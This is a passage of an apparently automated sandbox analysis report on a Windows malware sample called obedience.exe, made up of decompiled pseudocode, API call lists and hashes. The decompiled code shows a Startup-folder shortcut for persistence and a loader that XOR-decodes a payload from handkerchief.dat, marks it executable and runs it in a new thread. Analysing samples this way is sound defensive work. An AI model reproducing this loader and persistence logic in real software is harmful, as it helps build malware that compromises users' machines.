      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062F6
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406306
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406330
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00406340
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
      • API String ID: 1599918012-2375825460
      • Opcode ID: e0372c0f7ff9f7fa0e72ad92c661084590f743a0b0ec074fde03ecfba47853cc
      • Instruction ID: 9759b51b8d4752afdb32c10da32ac6c13e1e3f2cd71184b262c659eba76e4bcb
      • Opcode Fuzzy Hash: e0372c0f7ff9f7fa0e72ad92c661084590f743a0b0ec074fde03ecfba47853cc
      • Instruction Fuzzy Hash: 99315AB1E002096EEB25DAE8C885FEFB7BD9B18304F4041B6E945F21C1D7BCDA548B54
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 77%
      			E00450214(void* __ecx, void* __edi, void* __esi) {
      				intOrPtr _t6;
      				intOrPtr _t8;
      				intOrPtr _t10;
      				intOrPtr _t12;
      				intOrPtr _t14;
      				void* _t16;
      				void* _t17;
      				intOrPtr _t20;
      				intOrPtr _t21;
      				intOrPtr _t22;
      				intOrPtr _t23;
      				intOrPtr _t28;
      
      				_t25 = __esi;
      				_t17 = __ecx;
      				_push(_t28);
      				_push(0x45029a);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t28;
      				 *0x490ae4 =  *0x490ae4 - 1;
      				if( *0x490ae4 < 0) {
      					 *0x490ae0 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
      					_t31 =  *0x490ae0;
      					E0044FFC4(_t16, __edi,  *0x490ae0);
      					_t6 =  *0x440008; // 0x440054
      					E004192A4(_t6, _t16, _t17,  *0x490ae0);
      					_t8 =  *0x440008; // 0x440054
      					E00419344(_t8, _t16, _t17, _t31);
      					_t21 =  *0x440008; // 0x440054
      					_t10 =  *0x4516d0; // 0x45171c
      					E004192F0(_t10, _t16, _t21, __esi, _t31);
      					_t22 =  *0x440008; // 0x440054
      					_t12 =  *0x4502a4; // 0x4502f0
      					E004192F0(_t12, _t16, _t22, __esi, _t31);
      					_t23 =  *0x440008; // 0x440054
      					_t14 =  *0x4503c8; // 0x450414
      					E004192F0(_t14, _t16, _t23, _t25, _t31);
      				}
      				_pop(_t20);
      				 *[fs:eax] = _t20;
      				_push(0x4502a1);
      				return 0;
      			}















      0x00450214
      0x00450214
      0x00450219
      0x0045021a
      0x0045021f
      0x00450222
      0x00450225
      0x0045022c
      0x0045023c
      0x0045023c
      0x00450243
      0x00450248
      0x0045024d
      0x00450252
      0x00450257
      0x0045025c
      0x00450262
      0x00450267
      0x0045026c
      0x00450272
      0x00450277
      0x0045027c
      0x00450282
      0x00450287
      0x00450287
      0x0045028e
      0x00450291
      0x00450294
      0x00450299

      APIs
      • GetVersion.KERNEL32(00000000,0045029A), ref: 0045022E
        • Part of subcall function 0044FFC4: GetCurrentProcessId.KERNEL32(?,00000000,0045013C), ref: 0044FFE5
        • Part of subcall function 0044FFC4: GlobalAddAtomA.KERNEL32 ref: 00450018
        • Part of subcall function 0044FFC4: GetCurrentThreadId.KERNEL32 ref: 00450033
        • Part of subcall function 0044FFC4: GlobalAddAtomA.KERNEL32 ref: 00450069
        • Part of subcall function 0044FFC4: RegisterClipboardFormatA.USER32(00000000), ref: 0045007F
        • Part of subcall function 0044FFC4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00450103
        • Part of subcall function 0044FFC4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00450114
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
      • String ID:
      • API String ID: 3775504709-0
      • Opcode ID: 99a6a56ef9735737fb243dd123541b5c58fe268f1ee0796e937040d8834d0986
      • Instruction ID: 5f2b3dc7c252a93053ceec97a7601ca6eb9e7775c231ac8226f64bee21a35208
      • Opcode Fuzzy Hash: 99a6a56ef9735737fb243dd123541b5c58fe268f1ee0796e937040d8834d0986
      • Instruction Fuzzy Hash: 3CF03C382043405FC751EB66FC56A193394FB4671979008B7FD8483A72CA38AC95CB4C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 37%
      			E004637A8(intOrPtr _a4) {
      				intOrPtr _t26;
      
      				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
      				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
      				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
      				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
      				_push(_t26); // executed
      				L00407550(); // executed
      				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
      				return _t26;
      			}




      0x004637b4
      0x004637be
      0x004637c7
      0x004637ce
      0x004637d1
      0x004637d2
      0x004637dd
      0x004637e1

      APIs
      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004637D2
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: NtdllProc_Window
      • String ID:
      • API String ID: 4255912815-0
      • Opcode ID: f6783cbb0f82c5e6183b62038751e87edbaa8b553a5cbe2586449f86de3d3719
      • Instruction ID: a21ef04ae8dbeb1d7254c19205c9d438faeb913b3d1d138aaf0a52a2797f34f8
      • Opcode Fuzzy Hash: f6783cbb0f82c5e6183b62038751e87edbaa8b553a5cbe2586449f86de3d3719
      • Instruction Fuzzy Hash: A3F0C579605608AFCB40DF9DC588D8AFBE8BB4C360B058195B988CB721D234FD808F90
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 67%
      			E6ED91000() {
      				signed int _v8;
      				char _v267;
      				char _v268;
      				char _v1291;
      				char _v1292;
      				char _v2315;
      				char _v2316;
      				char _v3339;
      				char _v3340;
      				short _v7352;
      				void* _v7356;
      				void* _v7360;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t50;
      				CHAR* _t68;
      				intOrPtr* _t69;
      				intOrPtr* _t74;
      				intOrPtr* _t76;
      				intOrPtr* _t78;
      				intOrPtr* _t81;
      				intOrPtr* _t86;
      				void* _t87;
      				intOrPtr* _t88;
      				intOrPtr* _t94;
      				intOrPtr _t102;
      				intOrPtr _t127;
      				signed int _t133;
      
      				L6ED9E0A0(0x1cbc);
      				_t50 =  *0x6edaf2a0; // 0x267b4ecc
      				_v8 = _t50 ^ _t133;
      				_v3340 = 0;
      				E6ED98BE0( &_v3339, 0, 0x3ff);
      				_v1292 = 0;
      				E6ED98BE0( &_v1291, 0, 0x3ff);
      				_v2316 = 0;
      				E6ED98BE0( &_v2315, 0, 0x3ff);
      				_v268 = 0;
      				E6ED98BE0( &_v267, 0, 0x103);
      				GetModuleFileNameA(0, "C:\Users\jones\AppData\Local\Temp\obedience.exe", 0x104);
      				_t132 = lstrcpyA;
      				lstrcpyA( &_v268, "C:\Users\jones\AppData\Local\Temp\obedience.exe");
      				lstrcpyA( &_v3340, "C:\Users\jones\AppData\Local\Temp\obedience.exe");
      				__imp__SHGetSpecialFolderPathA(0,  &_v1292, 7, 0); // executed
      				lstrcpyA( &_v2316,  &_v1292);
      				_t131 = lstrcatA;
      				lstrcatA( &_v2316, "\\");
      				lstrcatA( &_v2316, "persuasion.lnk");
      				 *((char*)(L6ED95C98( &_v3340, 0x5c) + 1)) = 0;
      				_t68 = lstrcpyA( &_v1292,  &_v3340);
      				__imp__CoInitialize(0); // executed
      				__imp__CoCreateInstance(0x6eda61e8, 0, 1, 0x6eda61d8,  &_v7356); // executed
      				_t69 = _v7356;
      				_t102 =  *_t69;
      				if(_t68 < 0) {
      					L3:
      					_t121 =  *((intOrPtr*)(_t102 + 8));
      					 *((intOrPtr*)( *((intOrPtr*)(_t102 + 8))))(_t69);
      					__imp__CoUninitialize();
      					goto L4;
      				} else {
      					 *((intOrPtr*)( *((intOrPtr*)(_t102 + 0x50))))(_t69, "C:\Users\jones\AppData\Local\Temp\obedience.exe"); // executed
      					_t74 = _v7356;
      					 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 0x2c))))(_t74, 0);
      					_t76 = _v7356;
      					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 0x1c))))(_t76, 0);
      					_t78 = _v7356;
      					 *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x24))))(_t78,  &_v1292);
      					_t81 = _v7356;
      					_push( &_v7360);
      					_push(0x6eda61f8);
      					_push(_t81);
      					if( *((intOrPtr*)( *((intOrPtr*)( *_t81))))() >= 0) {
      						MultiByteToWideChar(0, 0,  &_v2316, 0xffffffff,  &_v7352, 0x104);
      						_t86 = _v7360;
      						_t127 =  *_t86;
      						_t121 =  *((intOrPtr*)(_t127 + 0x18));
      						_t87 =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x18))))(_t86,  &_v7352, 1); // executed
      						if(_t87 < 0) {
      							L4:
      							return L6ED95B58(0, 0, _v8 ^ _t133, _t121, _t131, _t132);
      						} else {
      							_t88 = _v7360;
      							 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
      							 *((intOrPtr*)( *((intOrPtr*)( *_v7356 + 8))))(); // executed
      							__imp__CoUninitialize(); // executed
      							return L6ED95B58(1, 0, _v8 ^ _t133,  *((intOrPtr*)( *_v7356 + 8)), lstrcatA, lstrcpyA, _v7356);
      						}
      					} else {
      						_t94 = _v7360;
      						 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 8))))(_t94);
      						_t69 = _v7356;
      						_t102 =  *_t69;
      						goto L3;
      					}
      				}
      			}
































      0x6ed91008
      0x6ed9100d
      0x6ed91014
      0x6ed91029
      0x6ed9102f
      0x6ed91041
      0x6ed91047
      0x6ed91059
      0x6ed9105f
      0x6ed91071
      0x6ed91077
      0x6ed9108a
      0x6ed91090
      0x6ed910a2
      0x6ed910b0
      0x6ed910bd
      0x6ed910d1
      0x6ed910d3
      0x6ed910e5
      0x6ed910f3
      0x6ed91106
      0x6ed91117
      0x6ed9111a
      0x6ed91134
      0x6ed9113c
      0x6ed91142
      0x6ed91144
      0x6ed911b7
      0x6ed911b7
      0x6ed911bb
      0x6ed911bd
      0x00000000
      0x6ed91146
      0x6ed9114f
      0x6ed91151
      0x6ed9115e
      0x6ed91160
      0x6ed9116d
      0x6ed9116f
      0x6ed91182
      0x6ed91184
      0x6ed91192
      0x6ed91193
      0x6ed91198
      0x6ed9119f
      0x6ed911ed
      0x6ed911f3
      0x6ed911f9
      0x6ed911fb
      0x6ed91208
      0x6ed9120c
      0x6ed911c5
      0x6ed911d5
      0x6ed9120e
      0x6ed9120e
      0x6ed9121a
      0x6ed91228
      0x6ed9122a
      0x6ed91245
      0x6ed91245
      0x6ed911a1
      0x6ed911a1
      0x6ed911ad
      0x6ed911af
      0x6ed911b5
      0x00000000
      0x6ed911b5
      0x6ed9119f

      APIs
      • _memset.LIBCMT ref: 6ED9102F
      • _memset.LIBCMT ref: 6ED91047
      • _memset.LIBCMT ref: 6ED9105F
      • _memset.LIBCMT ref: 6ED91077
      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\obedience.exe,00000104), ref: 6ED9108A
      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\obedience.exe), ref: 6ED910A2
      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\obedience.exe), ref: 6ED910B0
      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 6ED910BD
      • lstrcpyA.KERNEL32(?,?), ref: 6ED910D1
      • lstrcatA.KERNEL32(?,6EDA8F38), ref: 6ED910E5
      • lstrcatA.KERNEL32(?,persuasion.lnk), ref: 6ED910F3
        • Part of subcall function 6ED95C98: __mbsrchr_l.LIBCMT ref: 6ED95CA5
      • lstrcpyA.KERNEL32(?,?), ref: 6ED91117
      • CoInitialize.OLE32(00000000), ref: 6ED9111A
      • CoCreateInstance.OLE32(6EDA61E8,00000000,00000001,6EDA61D8,?), ref: 6ED91134
      • CoUninitialize.OLE32 ref: 6ED911BD
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 6ED911ED
      • CoUninitialize.OLE32 ref: 6ED9122A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: _memsetlstrcpy$Uninitializelstrcat$ByteCharCreateFileFolderInitializeInstanceModuleMultiNamePathSpecialWide__mbsrchr_l
      • String ID: C:\Users\user\AppData\Local\Temp\obedience.exe$persuasion.lnk
      • API String ID: 1421650274-2540443978
      • Opcode ID: 9c568d33768478b4c5e188ecd4b2c619395d95937d15debc9b2c10019de4ccfb
      • Instruction ID: a7150734d5ea74a184341718009713eb3e30068926ba22332875715a8caca070
      • Opcode Fuzzy Hash: 9c568d33768478b4c5e188ecd4b2c619395d95937d15debc9b2c10019de4ccfb
      • Instruction Fuzzy Hash: CE612C79A44218AFEB50DBA8CC85EEEB77CEF49344F0045C8E50997281DB34EE858F60
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 77%
      			E6ED91B50(void* __ebx) {
      				char _v164;
      				char _v180;
      				intOrPtr _v184;
      				intOrPtr _v252;
      				char _v340;
      				char _v348;
      				char _v352;
      				char _v364;
      				intOrPtr _v372;
      				CHAR* _v376;
      				intOrPtr _v384;
      				char _v388;
      				long _v392;
      				CHAR* _v396;
      				intOrPtr _v400;
      				intOrPtr _v408;
      				struct _SECURITY_ATTRIBUTES* _v428;
      				char _v436;
      				intOrPtr* _v440;
      				void* __edi;
      				void* __esi;
      				long _t109;
      				char* _t111;
      				intOrPtr _t117;
      				intOrPtr _t118;
      				long _t122;
      				void* _t123;
      				void* _t127;
      				signed int _t132;
      				signed int _t133;
      				long _t134;
      				long _t140;
      				intOrPtr _t141;
      				void* _t142;
      				void* _t144;
      				void* _t155;
      				signed int _t159;
      				signed int _t161;
      				signed int _t162;
      				signed int _t167;
      				signed int _t168;
      				intOrPtr _t175;
      				intOrPtr _t177;
      				intOrPtr _t178;
      				intOrPtr _t182;
      				void* _t183;
      				long _t185;
      				intOrPtr* _t186;
      				signed char _t193;
      				intOrPtr _t194;
      				void* _t195;
      				intOrPtr _t196;
      				intOrPtr _t197;
      				void* _t198;
      				void* _t202;
      				intOrPtr _t205;
      				void* _t206;
      				intOrPtr _t208;
      				void* _t211;
      				intOrPtr* _t212;
      				char* _t217;
      				signed char* _t219;
      				signed int _t222;
      				void* _t224;
      				signed int _t225;
      				void* _t248;
      
      				_t224 = (_t222 & 0xfffffff8) - 0x18c;
      				_v396 = 0;
      				_t109 = GetModuleFileNameA(GetModuleHandleA(0), "C:\Users\jones\AppData\Local\Temp\handkerchief.dat", 0x104);
      				_t215 = _t109;
      				lstrcpyA("C:\Users\jones\AppData\Local\Temp\obedience.exe", "C:\Users\jones\AppData\Local\Temp\handkerchief.dat");
      				_t3 = _t215 + 0x6edb12d7; // 0x6edb12d7
      				_t111 = _t3;
      				if( *((char*)(_t109 + 0x6edb12d7)) == 0) {
      					L4:
      					 *((char*)(_t111 + 1)) = 0;
      					lstrcatA("C:\Users\jones\AppData\Local\Temp\handkerchief.dat", "handkerchief.dat");
      					E6ED93DF0(_t229,  &_v180); // executed
      					_t200 =  *((intOrPtr*)(_v184 + 4));
      					if(( *(_t224 +  *((intOrPtr*)(_v184 + 4)) + 0xf4) & 0x00000006) != 0) {
      						E6ED96A1F(0);
      					}
      					_t216 =  &_v180;
      					E6ED93A00( &_v180); // executed
      					_t117 =  *((intOrPtr*)(_v180 + 4));
      					if(( *(_t224 + _t117 + 0xf4) & 0x00000006) != 0) {
      						_t177 =  *0x6eda8a6c; // 0xffffffff
      						_t118 =  *0x6eda8a68; // 0xffffffff
      						_v384 = _t177;
      						_t178 = 0;
      						__eflags = 0;
      						_v376 = 0;
      					} else {
      						_t208 =  *((intOrPtr*)( *((intOrPtr*)(_t224 + _t117 + 0x120))));
      						_t200 =  *((intOrPtr*)(_t208 + 0x28));
      						 *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x28))))( &_v388, 0, 0, 1, 1);
      						_t178 = _v400;
      						_t118 = _v408;
      					}
      					 *0x6edb12cc = _t118 + _t178;
      					if(E6ED94ED0( &_v164) == 0) {
      						_t200 = _v180;
      						_t197 =  *((intOrPtr*)(_v180 + 4));
      						_t198 = _t224 + _t197 + 0xe8;
      						_t167 =  *(_t224 + _t197 + 0xf4) | 0x00000002;
      						if( *((intOrPtr*)(_t198 + 0x38)) == 0) {
      							_t167 = _t167 | 0x00000004;
      						}
      						_t168 = _t167 & 0x00000017;
      						 *(_t198 + 0xc) = _t168;
      						_t235 =  *(_t198 + 0x10) & _t168;
      						if(( *(_t198 + 0x10) & _t168) != 0) {
      							_push(0);
      							L6ED91950(_t198, 0);
      						}
      					}
      					_t122 =  *0x6edb12cc; // 0x3e281
      					_push(_t122); // executed
      					_t123 = E6ED96310(_t200, 0, _t216, _t235); // executed
      					_t225 = _t224 + 4;
      					_t201 =  &_v364;
      					 *0x6edb12d0 = _t123;
      					_v364 = 0x6eda9418;
      					_v348 = 0x6eda9420;
      					_v252 = 0x6eda9360;
      					L6ED952A0(_t235,  &_v364,  &_v340);
      					_t217 =  &_v348;
      					 *((intOrPtr*)(_t225 +  *((intOrPtr*)(_v372 + 4)) + 0x30)) = 0x6eda9414;
      					E6ED94D70(_t217, _t235);
      					_t127 = E6ED94DE0( &_v364, 0x21); // executed
      					if(_t127 != 0) {
      						_t57 = _v364 + 4; // 0x0
      						_t182 =  *_t57;
      						_t183 = _t225 + _t182 + 0x30;
      						asm("sbb eax, eax");
      						_t132 = ( ~( *(_t225 + _t182 + 0x68)) & 0xfffffffc) + 4;
      						__eflags = _t132;
      					} else {
      						_t50 = _v364 + 4; // 0x0
      						_t196 =  *_t50;
      						_t183 = _t225 + _t196 + 0x30;
      						_t132 =  *(_t225 + _t196 + 0x3c) | 0x00000002;
      						if( *((intOrPtr*)(_t183 + 0x38)) == 0) {
      							_t132 = _t132 | 0x00000004;
      						}
      					}
      					_t133 = _t132 & 0x00000017;
      					 *(_t183 + 0xc) = _t133;
      					if(( *(_t183 + 0x10) & _t133) != 0) {
      						_push(0);
      						L6ED91950(_t183, 0);
      					}
      					_t134 =  *0x6edb12cc; // 0x3e281
      					asm("cdq");
      					E6ED938B0( &_v364, _t134, _t201); // executed
      					if(E6ED94ED0( &_v352) == 0) {
      						_t69 = _v364 + 4; // 0x0
      						_t194 =  *_t69;
      						_t195 = _t225 + _t194 + 0x30;
      						_t161 =  *(_t225 + _t194 + 0x3c) | 0x00000002;
      						if( *((intOrPtr*)(_t195 + 0x38)) == 0) {
      							_t161 = _t161 | 0x00000004;
      						}
      						_t162 = _t161 & 0x00000017;
      						 *(_t195 + 0xc) = _t162;
      						if(( *(_t195 + 0x10) & _t162) != 0) {
      							_push(0);
      							L6ED91950(_t195, 0);
      						}
      					}
      					_t185 =  *0x6edb12cc; // 0x3e281
      					_t202 =  *0x6edb12d0; // 0x2580048
      					VirtualProtect(_t202, _t185, 0x40,  &_v392);
      					_t140 =  *0x6edb12cc; // 0x3e281
      					_t211 =  *0x6edb12d0; // 0x2580048
      					_t175 =  *0x6edb13dc; // 0x3e271
      					_t141 = _t140 + 0xfffffff0;
      					_t80 = _t211 + 0x10; // 0x2580058
      					_t186 = _t80;
      					_v396 = _t186;
      					 *0x6edb12c8 = _t141;
      					if(_t175 >= _t141) {
      						L35:
      						_t142 = E6ED91000(); // executed
      						if(_t142 == 0) {
      							lstrcpynA(0x6edb14e8, "pedetdata", 0x104);
      							L6ED91250();
      						}
      						_t144 = CreateThread(0, 0, _v396, 0, 0, 0); // executed
      						CloseHandle(_t144);
      						Sleep(0x834); // executed
      						E6ED96A1F(0); // executed
      						asm("int3");
      						asm("int3");
      						asm("int3");
      						asm("int3");
      						asm("int3");
      						asm("int3");
      						asm("int3");
      						asm("int3");
      						_push(0xffffffff);
      						_push(0x6eda579b);
      						_push( *[fs:0x0]);
      						_push(_t186);
      						_push(_t217);
      						_push(_t211);
      						_push( *0x6edaf2a0 ^ _t225);
      						 *[fs:0x0] =  &_v436;
      						_t212 = _t186 + 0x70;
      						_v440 = _t212;
      						 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4)) + _t212 - 0x70)) = 0x6eda9414;
      						_v428 = 0;
      						L6ED93F00(_t212 - 0x58);
      						_v428 = 0xffffffff;
      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 - 0x70)) + 4)) + _t212 - 0x70)) = 0x6eda93bc;
      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 - 0x60)) + 4)) + _t212 - 0x60)) = 0x6eda93b4;
      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 - 0x70)) + 4)) + _t212 - 0x70)) = 0x6eda93ac;
      						 *_t212 = 0x6eda9358;
      						_t155 = E6EDA27C8(_t212);
      						 *[fs:0x0] = _v436;
      						return _t155;
      					} else {
      						asm("cdq");
      						_t159 = _t141 - _t202 >> 1;
      						_t219 = _t175 + _t186;
      						do {
      							_t193 =  *_t219;
      							if(_t175 >= _t159) {
      								_t205 = 8;
      								do {
      									_t193 = _t193 ^  *(_t205 + _t211);
      									_t205 = _t205 + 2;
      									 *_t219 = _t193;
      									__eflags = _t205 - 0x10;
      								} while (_t205 < 0x10);
      								goto L33;
      							}
      							_t206 = 0;
      							do {
      								_t193 = _t193 ^  *(_t206 + _t211);
      								_t206 = _t206 + 2;
      								 *_t219 = _t193;
      							} while (_t206 < 8);
      							L33:
      							_t175 = _t175 + 1;
      							_t219 =  &(_t219[1]);
      							 *0x6edb14e4 = _t205;
      							_t248 = _t175 -  *0x6edb12c8; // 0x3e271
      						} while (_t248 < 0);
      						 *0x6edb13dc = _t175; // executed
      						goto L35;
      					}
      				} else {
      					while( *_t111 != 0x5c) {
      						_t111 = _t111 - 1;
      						_t229 =  *_t111;
      						if( *_t111 != 0) {
      							continue;
      						}
      						goto L4;
      					}
      					goto L4;
      				}
      			}

      APIs
      • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\handkerchief.dat,00000104), ref: 6ED91B70
      • GetModuleFileNameA.KERNEL32(00000000), ref: 6ED91B77
      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\obedience.exe,C:\Users\user\AppData\Local\Temp\handkerchief.dat), ref: 6ED91B89
      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\handkerchief.dat,handkerchief.dat), ref: 6ED91BB9
      • VirtualProtect.KERNELBASE(02580048,0003E281,00000040,?,6EDA9418,0003E281,?,00000021), ref: 6ED91D90
      • lstrcpynA.KERNEL32(6EDB14E8,pedetdata,00000104,?,00000021), ref: 6ED91E1F
      • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 6ED91E39
      • CloseHandle.KERNEL32(00000000,?,00000021), ref: 6ED91E40
      • Sleep.KERNELBASE(00000834,?,00000021), ref: 6ED91E4B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: HandleModule$CloseCreateFileNameProtectSleepThreadVirtuallstrcatlstrcpylstrcpyn
      • String ID: C:\Users\user\AppData\Local\Temp\handkerchief.dat$C:\Users\user\AppData\Local\Temp\obedience.exe$handkerchief.dat$pedetdata
      • API String ID: 3594156554-2664055295
      • Opcode ID: 613ba6d6eec403316f5549ba8b0815ba929d8e14258bf57e70def600013f462c
      • Instruction ID: b2f10d5ef7ac0baf44385fc5b947eab740a7f852cdb46c717dd163760176df5a
      • Opcode Fuzzy Hash: 613ba6d6eec403316f5549ba8b0815ba929d8e14258bf57e70def600013f462c
      • Instruction Fuzzy Hash: 4391B270614742DFD750CFA8C885B9FB7E8BF86308F15892CE6958B281E730D54ADB61
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 42%
      			E004632B0(void* __eax, void* __ebx, void* __ecx) {
      				struct _WNDCLASSA _v44;
      				char _v48;
      				char* _t22;
      				long _t23;
      				CHAR* _t26;
      				struct HINSTANCE__* _t27;
      				intOrPtr* _t29;
      				signed int _t32;
      				intOrPtr* _t33;
      				signed int _t36;
      				struct HINSTANCE__* _t37;
      				void* _t39;
      				CHAR* _t40;
      				struct HWND__* _t41;
      				char* _t47;
      				char* _t52;
      				long _t55;
      				long _t59;
      				struct HINSTANCE__* _t62;
